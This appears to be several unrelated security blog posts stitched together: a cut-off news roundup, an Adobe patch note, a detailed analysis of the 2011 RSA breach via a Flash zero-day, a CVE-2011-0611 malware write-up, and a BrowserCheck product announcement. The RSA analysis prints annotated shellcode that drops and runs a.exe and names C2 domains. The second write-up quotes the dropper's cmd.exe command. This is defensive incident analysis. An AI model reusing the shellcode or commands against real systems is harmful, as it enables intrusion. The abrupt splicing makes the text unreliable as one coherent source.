A swipe of confidential data from almost 400,000 British Airways customers. A string of app takedowns at the Mac App Store after exfiltration findings. A gargantuan data breach at a Chinese hotel chain. An unpatched zero-day Windows bug exploited in the wild. These are some of the security news that have recently caught our eye.
Could British Airways hit GDPR turbulence after data breach?
Hackers breached British Airways’ website and mobile app during a two-week period recently, and may have stolen personal and financial information of 380,000 customers, including payment card details. The airline disclosed the hack last week, saying that the cyber criminals had access to the breached systems between Aug. 21 and Sept. 5.
Credit card information included the 3- or 4-digit security codes printed on the cards. Other information that was at risk included names, billing addresses, and email addresses. This set of information puts affected customers at risk for a variety of fraudulent activity, including unauthorized use of their payment card and email “phishing” scams.
Adobe released nine security bulletins today in the December Security updates. The most notable update was APSB16-39 for Flash which fixed a 0-day vulnerability with exploits in the wild that is being used in targeted attacks. Adobe products including Flash and Acrobat PDF reader have long being targeted by exploit kits. In addition to the 0-day (CVE-2016-7892), 17 other vulnerabilities were fixed in Flash. This update address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. Other updates included in today’s release fixed Coldfusion (APSB16-44) , Robohelp (APSB16-46), Adobe Digital Editions (APSB16-45), InDesign (APSB16-43) , Experience Manager (APSB16-42) , DNG Converter (APSB16-41) and Animate (APSB16-38).
The current threat landscape around cyber attacks is complex and hard to understand even for IT pros. The media coverage on recent events increases the challenge by putting fundamentally different attacks into the same category, often labeled as advanced persistent threats (APTs). The resulting mix of attacks includes everything from broadly used, exploit-kit driven campaigns driven by cyber criminals, to targeted attacks that use 0-day vulnerabilities and are hard to fend off – blurring the threat landscape, causing confusion where clarity is most needed.
This article analyzes a specific incident – last March’s RSA breach, explaining the techniques used by the attackers and detailing the vulnerability used to gain access to the network. It further explores the possible mitigation techniques available in current software on the OS and application level to prevent such attacks from reoccurring.
Introduction
In this article, I will examine the components used in a wave of attacks that happened earlier this year, first made public by RSA in March 2011. I will also detail the exploit mechanics and explain the possibilities for improving the defense mechanisms.
The implementation of these defense mechanisms could have neutralized the attack and prevented the installation of the final malware. I believe these defensive techniques apply to malware and other infection vectors, and should be implemented on a wider scale to prevent attacks.
For researchers looking to gain a comprehensive understanding in Adobe Flash vulnerabilities, this article will detail how the exploit works, the vulnerability internals and techniques used in the attack.
For security practitioners interested in having access to a better explanation of the incident, this blog will provide a good amount of information as well, since it emphasizes specifics of the attack procedure.
The article’s content is divided into six main sections, each one discussing possible workarounds that could have helped prevent an attack. Section 1 – ”General Mechanics of the Attack” explains what the attack was all about, and is a great starting point for those who are not aware of the already public details. Section 2 – “The Email” explains the initial mechanism used to spread the attack, which was an email sent to some specific employees of the target company. Section 3 – “The Spreadsheet” delves into the spreadsheet attached to the email and the results on the end-user when opening it. Section 4 -“The Exploit” discusses the actual exploit code and its payload (the shellcode, not the final, dropped malware). Next, in the section, “The Malware,” I discuss the fairly generic, straightforward malware used. In the final “Conclusion” section of the article, I discuss possible future trends and ways to proactively protect against attacks.
General Mechanics of the Attack
The attack was delivered by an email sent to specific individuals inside the target company. The email contents are going to be further discussed in the next sections, but in essence the email contained a attachment, a spreadsheet intended to be opened using Microsoft Excel. The spreadsheet itself included an embedded Flash object, which was configured to exploit a 0-day, i.e. previously unknown vulnerability in the Adobe Flash Player software, which is now categorized as CVE-2011-0609.
Once the Flash object ran, it installed the Poison Ivy RAT (Remote Administration Tool) included inside the Flash object to guarantee further access to the attackers. Poison Ivy has a plethora of capabilities available to its controller such as key-logging, scanning, data exfiltration and other mechanism that are designed to help the attacker to gain deeper access to the target’s network.
Cleverly addressed to one person, with more targets on CC, looks less like SPAM
Subject: 2011 Recruitment Plan
Subject of interest to HR and Managers
Body: I forward this file for you to review. Please, open and view it.
Too simple to look real, even accounting for current trends to simplify communication
Attachment: 2011 Recruitment Plan.xls
When this email was received by the mail system, it was classified as SPAM and put into the junk email folder. The email was convincing enough though, for at least one user that moved it back to the inbox for viewing.
The Spreadsheet
Once the user opened the attached spreadsheet with Microsoft Excel 2007, the user saw the following:
In the default configuration of Excel 2007, the embedded Flash content is automatically parsed by the Flash player. In this case, the Flash object executed and after 2-5 seconds, the Excel program closed.
Another version of this attack code (a strong evidence that it is a re-use of an attack against other targets) had a program that once executed opened a second spreadsheet, designed to be displayed to trick the user into attributing the behaviour to a technical glitch:
It is reasonable to assume that an end-user would not notice the quick opening/closing of Excel.
As I mentioned earlier, once the spreadsheet was opened, Excel automatically launched the Flash parser. This behaviour could have been easily prevented if the following techniques were in place:
There is a configuration setting of Office 2007 (Trust Center, ActiveX) that would prevent the immediate execution:
The more modern Office 2010 version of Excel contains another helpful feature: the new Protected View Sandbox prevents the automatic parsing of such embedded objects already in the standard configuration:
In such a case, the user needs to interact again in order for the exploit to work, by clicking on the “Enable Editing” option.
Lastly another feature that few users know about, which would have prevented this specific exploit from running, is Data Execution Prevention (DEP). DEP is a security technology that prevents applications from executing machine code stored in certain regions of memory that are marked as non-executable, a technique that is quite frequently used by exploits, for example during a buffer overflow attack. It was introduced in Windows XP SP2 around 2004 as an opt-in feature and can be activated manually through the Control Panel or network wide through a system policy.
Either way, once activated it prevents the exploit under analysis from running, as program “a” is attempting an illegal operation.
Although DEP is enabled by default in modern versions of Windows, such as Vista and Windows 7, Office 2007 opts for disabling it (calling NtSetInformationProcess()). If set to AlwaysOn or if using Office 2010 on modern Windows versions, this vulnerability would not have run on either of these OSes (as it is going to be discussed later, there is also a dependency of operating system in the shellcode used in this attack). The same Flash vulnerability continues to exist on these systems, but DEP prevents it from executing. The exploit would have to be modified to deal with the more constrained execution environment that DEP provides. Additionally, Windows Vista started using ASLR (Address Space Layout Randomization) which greatly difficulties the ways for bypassing DEP.
Most of this section will be related to the actual exploit code and what I did in the lab to trace its execution. To understand the inner workings of the vulnerability, I first reduced the embedded exploit code into a small PoC only containing the minimal SWF file (Flash file) to trigger the issue.
Adobe Flash is mainly used to create rich Internet content, for example adding videos and animations to web pages, and it is installed in almost all browsers. But it is supported as well by other content displayers, such as the Adobe PDF Reader and Microsoft Office Excel.
Small Web Format (SWF) is the file format used by Flash. Internally, Flash supports a scripting language know as ActionScript. ActionScript is interpreted by the ActionScript Virtual Machine (AVM), currently in version 2, while the newest version of ActionScript is 3.0. ActionScript is basically an implementation of the ECMAScript standardized language.
The script source code is compiled into segments to create the final SWF file. Those segments are called ActionScript Byte Code (ABC) segments. Each segment is described by the abcFile structure, used by the AVM to load the bytecode.
The documentation shows us that the abcFile structure is defined like:
The entire process (from the ActionScript source code to the JIT generated code) can be seen in the following diagram [1]:
The division into bytecode blocks depends on the jump targets, defined by the jump operators [1]. To guarantee proper execution of the generated code, the verification step tries to validate proper execution.
Most of the vulnerabilities related to Flash are due to mismatching between the verified process flow and the actual execution flow.
This will pass the verification, since it generates a safe execution flow.
If we change the first findpropstric to:
pushint 0x414141
We fail the verification process, since the callpropvoid expects an object and receives an integer. Obviously, if for any reason this passes the verification, we have a security issue.
When there is a verification error, the AVM throws a VerifyError. When the execution enters a method, there are three local data areas:
pushint 0x414141
operand stack segment -> Operands to the instructions (pushed/poped operand stack segment -> from the stack by the instructions) scope stack segment -> name lookup for the objects group of local registers -> parameter values, local vars and others
This specific vulnerability is due to the failure of the verifier to identify when the stack state has become inconsistent after a jump to the incorrect position. The next instructions will write to the wrong object into the ActiveScript stack, overwriting memory areas.
Trying to read from an invalid memory address. In:
mov eax, dword ptr ds:[ecx]
The read value (if successful) will be loaded in eax and then later in
call eax
execution is transferred to that location.
In the case of the exploit at hand, the first step was to isolate the swf file in the Excel spreadsheet.
Embedded Flash code is then spraying the memory and loading another flash file in the same context to trigger the vulnerability.
The shellcode in use by the exploit uses a known technique for finding the kernel base (it does not work in Windows 7 and thus the exploit code will not work against Windows 7 platform) [2].
In [2] we have the extracted shellcode. The shellcode will create and execute a file named a.exe. I’m providing it here with some additional comments:
; The next 6 instructions has been a well-known ; method to get the KernelBase and does not Work ; Against Windows 7 ; For references: [3] mov eax, large fs:30h ; PEB Base mov eax, [eax+0Ch] ; PEB_LDR_DATA ; (InInitOrderModuleLst) mov esi, [eax+1Ch] lodsd ; move to the next LIST_ENTRY mov esi, [eax+8] ; Get KernelBase jmp loc_401274
; Allocates space in the stack and then defines EDI ; as a pointer to the space (to be used inside the routine) ; This space will store the hashes for the functions ; the shellcode needs sub_401037 proc near pop eax sub esp, 200h mov edi, esp mov [edi+8], esi mov [edi+10h], eax ; offset of a.exe nop push dword ptr [edi+8] push 0C0397ECh call get_fn_by_hash mov [edi+1Ch], eax ; kernel32.GlobalAlloc push dword ptr [edi+8] push 7CB922F6h call get_fn_by_hash mov [edi+20h], eax ; kernel32.GlobalFree push dword ptr [edi+8] push 7C0017A5h call get_fn_by_hash mov [edi+24h], eax ; kernel32.CreateFileA push dword ptr [edi+8] push 0FFD97FBh call get_fn_by_hash mov [edi+28h], eax ; kernel32.CloseHandle push dword ptr [edi+8] push 10FA6516h call get_fn_by_hash mov [edi+2Ch], eax ; kernel32.ReadFile push dword ptr [edi+8] push 0E80A791Fh call get_fn_by_hash mov [edi+30h], eax ; kernel32.WriteFile push dword ptr [edi+8] push 0C2FFB025h call get_fn_by_hash mov [edi+34h], eax ; kernel32.DeleteFile push dword ptr [edi+8] push 76DA08ACh call get_fn_by_hash mov [edi+38h], eax ; kernel32.SetFilePointer push dword ptr [edi+8] push 0E8AFE98h call get_fn_by_hash mov [edi+3Ch], eax ; kernel32.WinExec push dword ptr [edi+8] push 78B5B983h call get_fn_by_hash mov [edi+40h], eax ; kernel32.TerminateProcess push dword ptr [edi+8] push 7B8F17E6h call get_fn_by_hash mov [edi+44h], eax ; kernel32.GetCurrentProcess push dword ptr [edi+8] push 0DF7D9BADh call get_fn_by_hash mov [edi+48h], eax ; kernel32.GetFileSize push dword ptr [edi+10h] call dword ptr [edi+34h] ; call DeleteFileA(a.exe) xor esi, esi
; To locate the handle to the excel file loc_40110F: inc esi ; check open handles with size ; greater then 65536 bytes lea eax, [edi+60h] push eax push esi call dword ptr [edi+48h] ; call GetFileSize cmp eax, 0FFFFFFFFh jz short loc_40110F cmp eax, 10000h jbe short loc_40110F mov [edi+4], eax mov [edi+60h], esi push dword ptr [edi+4] push 40h call dword ptr [edi+1Ch] ; GlobalAlloc(FileSize) mov [edi+5Ch], eax push 0 push 0 push 0 push dword ptr [edi+60h] call dword ptr [edi+38h] ; SetFilePointer to ; begin of file cmp eax, 0FFFFFFFFh jz short loc_401191 push 0 lea ebx, [edi+70h] push ebx push dword ptr [edi+4] push dword ptr [edi+5Ch] push dword ptr [edi+60h] call dword ptr [edi+2Ch] ; ReadFile mov ecx, [edi+70h] sub ecx, 10h mov eax, [edi+5Ch]
; Used to identify the binary file loc_401161: inc eax cmp dword ptr [eax], 47422E43h jnz short loc_401173 cmp dword ptr [eax+4], 19890604h ; Find in File ; 43 2E 42 47 04 06 89 19 jz short loc_401177
loc_401173: loop loc_401161 jmp short loc_401191 ; —————————————————
loc_401177: add eax, 8 mov [edi+14h], eax
loc_40117D: inc eax cmp dword ptr [eax], 4B635546h jnz short loc_40118F cmp dword ptr [eax+4], 19820424h jz short loc_40119D
; ===== S U B R O U T I N E ===== ; This subroutine is responsible for calling the functions ; based on its hash (thus providing better support to ; different addresses instead of using fixed definitions ; inside the shellcode) get_fn_by_hash proc near
arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch
push ebp mov ebp, esp push edi mov edi, [ebp+arg_0] mov ebx, [ebp+arg_4] push esi mov esi, [ebx+3Ch] mov esi, [ebx+esi+78h] add esi, ebx push esi mov esi, [esi+20h] add esi, ebx xor ecx, ecx dec ecx
loc_40123D: inc ecx lodsd add eax, ebx push esi xor esi, esi
loc_401253: cmp edi, esi pop esi jnz short loc_40123D pop edx mov ebp, ebx mov ebx, [edx+24h] add ebx, ebp mov cx, [ebx+ecx*2] mov ebx, [edx+1Ch] add ebx, ebp mov eax, [ebx+ecx*4] add eax, ebp pop esi pop edi pop ebp retn 8 get_fn_by_hash endp
loc_401274: call sub_401037 ; ———————————————————– aA_exe db 'a.exe',0
The malware used in this case was fairly generic, most likely chosen by the attackers for its functionality and ability to evade detection by popular AV tools. It was a version of Poison Ivy, which is a RAT tool providing complete control of a victim’s machine, allowing installation of more software, monitoring of keystrokes, and other network reconnaissance activities.
The malware, a version of a toolkit available since 2005, was configured to connect back to the mincesur.com domain at good.mincesur.com. This domain had been associated with malicious activity before using names such as download.mincesur.com, good.mincesur.com, man.mincesur.com and in connection with domain wekby.com (hjkl.wekby.com, qwer.wekby.com, uiop.wekby.com). This is a good example of the importance of outbound traffic control as a security measure since those domains had been identified as malicious even before the attack by a number of security companies. It illustrates the need for a fast and reliable information exchange schema so that such domains can be blocked as soon as possible.
Conclusion
While I investigated an exploit on Adobe Flash, the sheer number of software installed on modern machines in network environments opens the door for similar attacks. The complexities of typical software packages create a huge attack surface, a fact that has been repeatedly utilized by exploit writers.
Modern defense mechanisms exist to impede the success of such attacks. They create a barrier by elevating the technical difficulty of the attack. There is a tremendous opportunity for IT pros to turn the tables on the attackers and increase the cost of the attack to a level where all but the most determined attackers will fail. This covers the great majority of attacks, including automated attacks and those re-using previously delivered exploit codes.
Acknowledgements
I would like to thank Mikko Hypponen from F-Secure for sharing the emails they found related to this attack. Having access to trusted sources for the data to be analyzed is very important for a technical report.
Special thanks also goes to Wolfgang Kandek, Qualys CTO, for giving me the time to work to understand the technical underpinnings of the attack and for helping me with reproducing each step. This is very time intensive part of the setup where multiple virtual machines are needed to cover all possible scenarios.
Great technical feedback and corrections by Sean Larsson from Verisign iDefense and Timo Hirvonen from F-Secure made this article more accurate and informative, thank you both.
Adobe recently released an advisory warning about a zero day vulnerability affecting Adobe Flash Player 10.2.153.1 being exploited in the wild. The attack uses a flash .swf file embedded inside a seemingly innocuous .doc file. The embedded .swf file uses ActionScript to perform a heap spray and then loads another malicious swf files created via the loadBytes() function.
(Click figure below for full resolution image).
Sample
File: Disentangling Industrial Policy and Competition Policy.doc
MD5: 96cf54e6d7e228a2c6418aba93d6bd49
SHA1: 820699d9999ea3ba07e7f0d0c7f08fe10eae1d2d
CVE: CVE-2011-0611
File Type: MS Word.doc file with embedded flash .swf file
Analysis of the Malware:
On opening the .doc file, the vulnerability in flash player is exploited and it creates “scvhost.exe” and “AAAA” files in the %temp% directory. The “scvhost.exe” is the malware dropper and file “AAAA” is a dummy word file that will be shown to the user after the exploited is completed.
Once scvhost.exe is created, this file is then executed using the command “cmd /c “%temp%\\scvhost.exe””.
The malware then replaces the original .doc malicious file with the innocuous “AAAA” file it created and then opens it. It also kills “hwp.exe” process. It does this by executing the following command:
cmd.exe /c "dir /s %windir%\system32\*.sys&&taskkill /im hwp.exe /f &
dir /a /s %windir%\system32\*.msc && copy %temp%\\AAAA "C:\Documents
and Settings\Rodrigo\Desktop\Disentangling Industrial Policy and Competition
Policy.doc " /y && "C:\Documents and Settings\Rodrigo\Desktop\Disentangling
Industrial Policy and Competition Policy.doc"
The scvhost.exe process on startup stops the “WmdmPmSN” service. The scvhost.exe process now copies the “SFC_OS.dll” to a temp file.
Copies the windows %system32%\\mspmsnsv.dll to %programfiles%\\commonfiles\\bak.dll. The system32%\\mspmsnsv.dll file is then moved to %temp% dir and set to delete on restart.
Svchost.exe then creates the malicious %system32%\\mspmsnsv.dll and msimage.dat.
Svchost.exe then copies this %system32%\\mspmsnsv.dll to %system32%\\dllchace\\mspmsnsv.dll
Svchost.exe is then moved to a %temp%\\[tempfilename] and is then set to delete on reboot and starts the “WmdmPmSN” service. Thus leaving no trace of any malicious executable on system.
Once the service restarts it tries to connect to its masters at liciayee.dyndns-free.com.
Files Created and MD5:
Conclusion
As a best practice, avoid opening unexpected e-mails or attachments and do no click on links from un-trusted sources. Adobe has released a critical security advisory APSA11-02 and is in the process of finalizing a fix for Adobe Flash Player 10.2.x, Adobe Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh, Adobe Reader X (10.0.1) for Macintosh, and Adobe Reader 9.4.3 and earlier 9.x versions for Windows and Macintosh.Google Chrome users can update to Chrome version 10.0.648.205. Verify the version of Google Chrome installed on your system. QualysGuard customers can scan for QID: 119144 for Adobe Flash and QID: 119145 for Adobe Reader/Acrobat for detecting this vulnerability in their network.
As we approach the peak of the holiday online shopping season, Qualys BrowserCheck adds new features to help Internet users better protect their browsers. With today’s new release, Qualys BrowserCheck increases the range of browsers it scans, including Linux browsers, beta releases of browsers, and more plugins. BrowserCheck also reports zero-day vulnerabilities and makes it easier to upgrade out-of-date plugins.
Here’s a round-up of the new features:
Linux Support: BrowserCheck adds support for Firefox, Chrome, and Opera on Linux to its current support of major browsers on Windows and Mac OS X. See supported browsers for details.
Plugin / Add-on Support: BrowserCheck adds checks for additional plugins and add-ons. The new checks extend support to Linux for the most popular plugins like Adobe Reader, and add support across all relevant platforms for plugins like DivX Web Player. See supported checks for details.
Beta Browser Support: Qualys BrowserCheck now scans beta versions of browsers including Internet Explorer 9, Firefox 4, Chrome 9 and Opera 11. See supported browsers for details.
Zero-day Vulnerabilities: Sometimes a vulnerability exists, but there is no fix (yet) for it. Qualys BrowserCheck now detects these zero-day vulnerabilities and points to any available advisories containing recommended workarounds. When the fix becomes available, BrowserCheck is updated to display the Fix-it Button with a link to the download containing the fix.
Easier Upgrades: Wherever possible, we are updating Fix It button links in the scan results to point directly to the download that fixes the vulnerable plugin or add-on, rather than the homepage for the plugin or add-on. This makes it easier to quickly upgrade and protect your browser from the vulnerability.
Thanks to the BrowserCheck users who have reported feedback or enhancements. Your input helps us identify areas of improvement, and have certainly been a factor in today’s release. We encourage you to continue letting us know how BrowserCheck is working for you.
